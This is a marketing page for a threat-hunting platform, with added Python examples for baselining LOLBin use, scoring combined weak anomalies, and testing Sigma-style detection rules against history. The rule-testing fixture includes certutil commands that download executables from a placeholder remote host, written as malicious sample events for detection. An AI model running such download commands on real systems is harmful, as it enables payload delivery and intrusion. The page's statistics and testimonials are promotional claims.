57% of breaches are discovered by outsiders — not your SOC, not your SIEM, not your EDR. The attackers who evade automated detection are the ones who cause catastrophic damage. They use legitimate tools. They move slowly. They blend in. They are patient. Citadel Vanguard hunts them — proactively, continuously, relentlessly — using hypothesis-driven investigation, behavioral analytics, and AI-augmented telemetry to find what your automated defenses were designed to miss.
Your detection stack has a ceiling. It will always have a ceiling. Because the most dangerous adversaries design their operations specifically to stay below it. They use PowerShell, not malware. They use RDP, not exploits. They use your own service accounts, not their own credentials. They move at human speed — one step per day, one lateral movement per week — staying below the thresholds your detection rules were tuned to catch. These are the adversaries that cause $4.4 million breaches. And your SIEM will never alert on them.
Vanguard exists in the space above the detection ceiling — where human expertise, hypothesis-driven investigation, and AI-augmented analytics converge to find the threats that automation was never designed to catch. Every hunt begins with a question: "What would this specific adversary do in our specific environment?" Then the hunter goes looking for the answer — armed with behavioral baselines, cross-domain telemetry, threat intelligence, and ML anomaly detection that surfaces the subtle signals hidden in petabytes of normal activity.
Vanguard provides the platform, the data, and the AI — your hunters provide the hypotheses, the intuition, and the judgment.
Every hunt starts with a question — a falsifiable hypothesis about adversary behavior. "An attacker has compromised a service account and is using WMI for lateral movement." "A threat actor is staging data in a cloud storage bucket before exfiltration." "An insider is using legitimate tools to access data outside their role." Vanguard structures the entire hunt lifecycle: hypothesis generation (AI-suggested based on your industry, threat profile, and ATT&CK coverage gaps), data scoping, query execution across all telemetry sources, anomaly analysis, validation, and — critically — conversion of validated findings into automated detection rules so the same threat is caught automatically next time.
The most sophisticated adversaries never install malware — they use the tools already present on every Windows system. PowerShell for command execution. WMI for lateral movement. Certutil for file download. PsExec for remote execution. RDP for interactive access. These "living-off-the-land binaries" (LOLBins) are legitimate administration tools — and they generate zero malware signatures. Vanguard's LOTL detection engine baselines normal administrative tool usage for every user, every service account, and every system — then hunts for deviations that indicate adversary abuse: PowerShell execution by users who never use it, WMI connections at unusual hours, PsExec from workstations that should never initiate remote administration.
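The baseline-and-deviate logic described above can be shown end to end on a few constructed process-start records. The following is an added example, not Vanguard's code: it learns, per user, which LOLBins they run and at which hours, then flags hunt-window events where a user runs a tool they never used, runs it far outside their usual hours, or launches PsExec from a host that is not an approved admin host. The log format, the `ADMIN_HOSTS` set and every event in both logs are constructed for the example.

```python
from collections import defaultdict

# LOLBins named on the page; the set is an assumption and would be extended in practice
LOLBINS = {"powershell.exe", "wmic.exe", "certutil.exe", "psexec.exe", "mstsc.exe"}

# Assumption: the only hosts expected to initiate remote administration
ADMIN_HOSTS = {"ADMIN-JUMP01"}

# Constructed 30-day baseline window, one process start per line:
# "ISO-timestamp|user|host|image"
BASELINE_LOG = """\
2024-03-01T09:12:00|svc_backup|SRV-DB01|powershell.exe
2024-03-01T09:40:00|svc_backup|SRV-DB01|powershell.exe
2024-03-02T10:05:00|svc_backup|SRV-DB01|powershell.exe
2024-03-03T14:30:00|jsmith|ADMIN-JUMP01|psexec.exe
2024-03-04T15:10:00|jsmith|ADMIN-JUMP01|psexec.exe
2024-03-04T11:00:00|jsmith|ADMIN-JUMP01|wmic.exe
2024-03-05T13:00:00|jsmith|ADMIN-JUMP01|wmic.exe
2024-03-06T11:25:00|mlee|WS-FIN-07|excel.exe
2024-03-07T11:30:00|mlee|WS-FIN-07|outlook.exe
"""

# Constructed hunt window: the events to evaluate against the baseline
HUNT_LOG = """\
2024-04-02T11:15:00|jsmith|ADMIN-JUMP01|wmic.exe
2024-04-02T03:05:00|jsmith|ADMIN-JUMP01|wmic.exe
2024-04-03T16:40:00|mlee|WS-FIN-07|powershell.exe
2024-04-03T16:42:00|mlee|WS-FIN-07|psexec.exe
2024-04-03T09:30:00|svc_backup|SRV-DB01|powershell.exe
"""


def parse(log):
    """Yield one dict per non-empty line of the pipe-delimited log."""
    for line in log.splitlines():
        if not line.strip():
            continue
        ts, user, host, image = line.split("|")
        yield {"hour": int(ts[11:13]), "user": user, "host": host, "proc": image.lower()}


def build_baseline(log):
    """Learn user -> process -> set of hours in which that user started it."""
    baseline = defaultdict(lambda: defaultdict(set))
    for ev in parse(log):
        baseline[ev["user"]][ev["proc"]].add(ev["hour"])
    return baseline


def hunt_lolbin_deviations(baseline, log, admin_hosts=ADMIN_HOSTS, hour_slack=1):
    """Return (user, host, process, reason) for each LOLBin event that deviates
    from the user's own baseline. Non-LOLBin processes are ignored."""
    findings = []
    for ev in parse(log):
        proc = ev["proc"]
        if proc not in LOLBINS:
            continue
        user_hours = baseline.get(ev["user"], {}).get(proc)
        if not user_hours:
            findings.append((ev["user"], ev["host"], proc, "no baseline usage by this user"))
        elif all(abs(ev["hour"] - h) > hour_slack for h in user_hours):
            findings.append((ev["user"], ev["host"], proc,
                             f"outside usual hours {sorted(user_hours)}"))
        # Remote-admin tooling from a host that never should start it is a
        # separate signal, raised even when the user has a baseline for the tool.
        if proc == "psexec.exe" and ev["host"] not in admin_hosts:
            findings.append((ev["user"], ev["host"], proc,
                             "remote admin initiated from non-admin host"))
    return findings


if __name__ == "__main__":
    for finding in hunt_lolbin_deviations(build_baseline(BASELINE_LOG), HUNT_LOG):
        print(finding)
```

On the constructed data the hunt returns four findings: jsmith's 03:05 WMI use (the user runs wmic, but only around 11:00 and 13:00 in the baseline), mlee's first-ever PowerShell, and mlee's PsExec twice (no baseline, and launched from a finance workstation). The svc_backup PowerShell event matches its own baseline and is not raised, which is the point of per-entity baselines rather than a global "PowerShell is suspicious" rule.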
Effective threat hunting requires knowing who is likely to target you — and how they operate. Vanguard's adversary intelligence engine maintains continuously updated profiles of 200+ documented threat groups, mapping their preferred tactics, techniques, and procedures to the MITRE ATT&CK framework. The system prioritizes threat groups by relevance to your industry vertical, geographic presence, technology stack, and known targeting patterns — so your hunters focus on the adversaries most likely to be in your environment, not the ones making headlines in someone else's industry.
The adversaries who cause the most damage are the ones who move slowly — one lateral movement per day, one new access per week, always staying below detection thresholds. Vanguard's behavioral analytics engine builds dynamic baselines for every entity in your environment: users (login times, access patterns, data volumes), devices (process execution, network connections, service startups), and services (API call patterns, data flow volumes, authentication behavior). The engine surfaces anomalies that individually seem benign but collectively indicate compromise — a login from a new location + access to an unusual file share + a data transfer slightly above average = a pattern that deserves investigation.
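The "individually benign, collectively suspicious" scoring described above can be made concrete with a small composite-score model. This is an added example, not Vanguard's analytics engine: each weak signal (new login location, unfamiliar file share, transfer volume only slightly above the user's own mean) carries a weight that is below the investigation threshold on its own, while a genuinely extreme volume carries enough weight to trigger alone, as a simple threshold rule would. The baseline structure, the weights, the threshold and the sample activity are all constructed assumptions.

```python
import statistics

# Constructed per-user baselines as learned over a 30-day window (assumed structure)
BASELINES = {
    "avery": {
        "locations": {"NYC-office", "home-VPN"},
        "shares": {"\\\\fs01\\finance"},
        "daily_mb": [120, 130, 125, 118, 140, 135, 128, 122, 131, 126],
    },
}

# Assumed weights: no single weak signal reaches the threshold, an extreme
# volume deviation (the kind a static threshold rule would catch) does.
WEIGHTS = {"new_location": 2, "unusual_share": 2, "volume_elevated": 1, "volume_extreme": 4}
COMPOSITE_THRESHOLD = 4


def volume_zscore(value, samples):
    """Standard deviations between value and the user's own daily-volume history."""
    mean = statistics.fmean(samples)
    sd = statistics.stdev(samples) if len(samples) > 1 else 0.0
    return 0.0 if sd == 0 else (value - mean) / sd


def score_activity(user, activity, baselines=BASELINES):
    """Return (score, reasons) for one day's activity against the user's baseline.
    activity = {"locations": set, "shares": set, "mb_transferred": number}"""
    base = baselines[user]
    score, reasons = 0, []

    new_locations = activity["locations"] - base["locations"]
    if new_locations:
        score += WEIGHTS["new_location"]
        reasons.append(f"login from new location(s) {sorted(new_locations)}")

    new_shares = activity["shares"] - base["shares"]
    if new_shares:
        score += WEIGHTS["unusual_share"]
        reasons.append(f"access to unusual share(s) {sorted(new_shares)}")

    z = volume_zscore(activity["mb_transferred"], base["daily_mb"])
    if z >= 3:
        score += WEIGHTS["volume_extreme"]
        reasons.append(f"transfer volume {z:.1f} sd above baseline (extreme)")
    elif z >= 1:
        score += WEIGHTS["volume_elevated"]
        reasons.append(f"transfer volume {z:.1f} sd above baseline (slight)")

    return score, reasons


def needs_investigation(user, activity, threshold=COMPOSITE_THRESHOLD):
    """True when the combined weak signals cross the investigation threshold."""
    score, _ = score_activity(user, activity)
    return score >= threshold


# Constructed days of activity for the sample user
COMPOSITE_DAY = {"locations": {"Lisbon"}, "shares": {"\\\\fs01\\hr"}, "mb_transferred": 137}
NORMAL_DAY = {"locations": {"NYC-office"}, "shares": {"\\\\fs01\\finance"}, "mb_transferred": 135}
BULK_DAY = {"locations": {"NYC-office"}, "shares": {"\\\\fs01\\finance"}, "mb_transferred": 175}

if __name__ == "__main__":
    for name, day in [("composite", COMPOSITE_DAY), ("normal", NORMAL_DAY), ("bulk", BULK_DAY)]:
        print(name, score_activity("avery", day), needs_investigation("avery", day))
```

With the constructed baseline the composite day transfers only about 1.4 standard deviations more than usual, which a volume-only rule tuned at 3 sigma would never raise; combined with the new location and the unfamiliar share it scores 5 and is queued for a hunter. The normal day scores 1 (a slightly busy but otherwise routine day), and the bulk day is caught on volume alone.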
Hunters can only find what they can see — and most hunting programs are limited by fragmented data access across siloed tools. Vanguard provides a unified hunt data lake that aggregates telemetry from endpoint (process, file, registry, network), network (flow, PCAP, DNS), cloud (audit logs, IAM, storage), identity (AD, Entra, Okta), email (gateway, inbox), and SaaS (O365, Salesforce, Slack) into a single, high-performance query interface. Hunters can search across all domains simultaneously using natural language ("Show me all PowerShell execution by service accounts in the last 30 days") or structured queries (KQL, SPL, Sigma) — eliminating the tool-switching that consumes 40% of a hunter's time in fragmented environments.
A hunt without a detection flywheel is a missed opportunity. Every time a hunter finds a threat that automated detection missed, the natural question is: "Why didn't our SIEM catch this?" Vanguard's flywheel engine answers that question and solves it. When a hunt validates a finding, the system automatically generates a detection rule in the appropriate format (Sigma, YARA, KQL, SPL), tests the rule against historical data to measure false positive rate, and deploys the validated rule to Citadel's SIEM. Over time, the flywheel continuously expands automated coverage based on real-world hunt findings — so each hunt makes the next one less necessary for that specific technique.
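The flywheel step (turn a validated finding into a rule, measure it against history, deploy only if it holds up) is easiest to see with a miniature Sigma-style pipeline. The following is an added example and not Vanguard's flywheel engine: rules are Python dicts in Sigma's `title`/`logsource`/`detection` layout, matched with a small subset of Sigma semantics (`endswith`, `contains`, exact match, lists as OR, case-insensitive), and scored against a constructed 90-day history in which the `malicious` flag stands for the hunt's validation verdict. A broad rule that fires on any certutil execution is rejected for its false-positive rate; the narrower rule built from the validated finding is accepted. The history, the rules and the 10% acceptance threshold are all constructed assumptions.

```python
# Constructed 90-day process history; "malicious" records the hunt's validation verdict
HISTORY = [
    {"Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil -hashfile setup.msi SHA256", "User": "jsmith", "malicious": False},
    {"Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil -verify cert.cer", "User": "pki_admin", "malicious": False},
    {"Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil -urlcache -split -f http://203.0.113.5/a.txt a.exe",
     "User": "mlee", "malicious": True},
    {"Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil -urlcache -split -f http://203.0.113.5/b.txt b.dll",
     "User": "mlee", "malicious": True},
    {"Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd /c dir",
     "User": "jsmith", "malicious": False},
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -File backup.ps1", "User": "svc_backup", "malicious": False},
]

# Candidate rules in Sigma's structure (constructed for this example)
BROAD_RULE = {
    "title": "Certutil Execution",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {"selection": {"Image|endswith": "\\certutil.exe"}, "condition": "selection"},
    "level": "medium",
}
NARROW_RULE = {
    "title": "Certutil Used To Fetch A Remote File",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection": {"Image|endswith": "\\certutil.exe", "CommandLine|contains": ["urlcache"]},
        "condition": "selection",
    },
    "level": "high",
}


def matches(rule, event):
    """Evaluate a single 'selection' against one event (subset of Sigma semantics)."""
    for key, expected in rule["detection"]["selection"].items():
        field, _, modifier = key.partition("|")
        actual = str(event.get(field, "")).lower()
        options = [str(o).lower() for o in (expected if isinstance(expected, list) else [expected])]
        if modifier == "endswith":
            ok = any(actual.endswith(o) for o in options)
        elif modifier == "contains":
            ok = any(o in actual for o in options)
        elif modifier == "":
            ok = actual in options
        else:
            raise ValueError(f"unsupported modifier {modifier!r}")
        if not ok:
            return False
    return True


def evaluate(rule, history=HISTORY, max_fp_rate=0.10):
    """Replay the rule over history. fp_rate is the share of hits that were not
    validated as malicious; recall is the share of validated findings the rule
    would have caught. Deploy only when recall is complete and fp_rate is tolerable."""
    hits = [e for e in history if matches(rule, e)]
    true_pos = sum(1 for e in hits if e["malicious"])
    false_pos = len(hits) - true_pos
    validated = sum(1 for e in history if e["malicious"])
    fp_rate = false_pos / len(hits) if hits else 0.0
    recall = true_pos / validated if validated else 0.0
    return {"hits": len(hits), "fp_rate": fp_rate, "recall": recall,
            "deploy": recall == 1.0 and fp_rate <= max_fp_rate}


def render_sigma(rule):
    """Minimal YAML emitter for the rule dict (avoids a PyYAML dependency)."""
    def emit(obj, indent):
        out = []
        for key, val in obj.items():
            pad = " " * indent
            if isinstance(val, dict):
                out.append(f"{pad}{key}:")
                out.extend(emit(val, indent + 2))
            elif isinstance(val, list):
                out.append(f"{pad}{key}:")
                out.extend(f"{pad}  - '{v}'" for v in val)
            else:
                out.append(f"{pad}{key}: '{val}'")
        return out
    return "\n".join(emit(rule, 0)) + "\n"


if __name__ == "__main__":
    for rule in (BROAD_RULE, NARROW_RULE):
        print(rule["title"], evaluate(rule))
    print(render_sigma(NARROW_RULE))
```

Replayed over the constructed history, the broad rule hits all four certutil executions, two of them routine admin work, for a 50% false-positive rate and no deployment; the narrow rule hits exactly the two validated downloads and is rendered as Sigma YAML for hand-off to the SIEM. The recall check matters as much as the false-positive check: a rule that is quiet because it misses the validated behaviour would close the flywheel loop on paper only.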
The most valuable threat intelligence often comes from outside your perimeter — from the criminal underground where stolen credentials are sold, where initial access brokers auction network footholds, and where threat actors discuss targeting your industry. Vanguard monitors dark web forums, paste sites, criminal marketplaces, Telegram channels, and underground access broker sites for your organization's credentials, domain mentions, data samples, and infrastructure references. When your data appears in the underground, Vanguard generates an immediate hunt — searching your environment for evidence that the compromised credentials have been used or that the advertised access point has been exploited.
Threat hunting requires a rare combination of adversary mindset, deep technical expertise, and investigative intuition — talent that most organizations cannot recruit or retain. Vanguard's managed hunt service provides dedicated Citadel hunters who conduct continuous hunt campaigns against your environment using your telemetry, your threat profile, and your risk priorities. Each hunter averages 12 years of adversary-focused experience, including backgrounds in national intelligence, law enforcement cyber units, and enterprise red teams. Findings are delivered with full context, MITRE ATT&CK mapping, and detection rules — and integrated directly into your Citadel SIEM and SOAR workflows.
The DNS tunneling implant had been in our environment for eighteen months. Eighteen months. Our SIEM processed the DNS traffic every day and never alerted — because the traffic volume was designed to look like NTP updates. Our EDR saw a legitimate Windows service making DNS queries and flagged nothing. Our network monitoring saw encrypted traffic to a known DNS resolver and ignored it. A Vanguard hunter noticed that the query frequency deviated from actual NTP patterns by 0.3 standard deviations. That deviation — invisible to every automated system we own — was the thread that unraveled an 18-month nation-state operation in our SCADA network.
The detection flywheel is the most underappreciated feature. Every hunt that finds something produces a detection rule. Every detection rule means the automated layer catches that behavior next time. After six months of Vanguard hunts, our automated detection coverage expanded by 34 new rules — each one based on a real threat found in our real environment by a real hunter. Not theoretical rules from a vendor template. Rules born from actual adversary behavior. That is how you turn proactive hunting into permanent defensive improvement.
We discovered our departing VP was stealing $2.3 billion in client portfolio data — and our DLP never saw it. The data was leaving via browser upload to a personal OneDrive account, in increments small enough to stay below every threshold we had set. Without the behavioral baseline that showed a 340% increase in data access since the notice period, and the cross-domain telemetry that tracked the browser uploads our DLP didn't monitor, that data would have walked out the door. Vanguard did not just find a threat. It prevented a business catastrophe.
Deploy Vanguard — as a platform for your hunt team, or as a managed service with Citadel's elite hunters operating in your environment.